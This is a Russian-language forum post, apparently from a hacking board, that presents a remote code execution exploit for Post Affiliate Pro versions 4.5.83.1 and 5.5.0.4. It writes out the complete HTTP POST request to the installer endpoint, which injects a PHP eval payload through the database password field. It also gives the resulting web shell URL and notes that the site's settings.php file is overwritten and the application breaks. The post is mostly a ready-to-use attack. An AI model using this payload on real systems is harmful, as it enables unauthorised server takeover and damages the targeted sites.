Тема: Post Affiliate Pro
Показать сообщение отдельно
Старый 06.09.2016, 00:26   #4
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Remote Code Execution

4.5.83.1 и 5.5.0.4 уязвимы точно. Возможно как выше, так и ниже. Нужно отправить два запроса:

Цитата:
POST /affiliates/scripts/server.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded

D={"C":"Gpf_Rpc_Server", "M":"run", "requests":[{"C":"Gpf_Install_CreateDatabase", "M":"goNext", "fields":[["name","value"],["Id",""],["Hostname","HOST"],["Username","USER"],["Password","*/eval($_REQUEST[rce]);/*"],["Dbname","DB"]]}], "S":"SESSIONID"}
HOST - хост с открытой MySQL
USER - пользователь для подключения к MySQL с паролем */eval($_REQUEST[rce]);/*
DB - база данных
SESSIONID - любая активная сессия на site.com

Веб-шелл будет по адресу:
Цитата:
http://site.com/affiliates/accounts/settings.php?rce=phpinfo();
Файл конфигурации settings.php при этом перезапишется и приложение не будет работать!

Если, по каким-то причинам, на settings.php не хватает прав (по дефолту хватает), то при старых версиях PHP остаётся возможность читать файлы.
crlf вне форума   Ответить с цитированием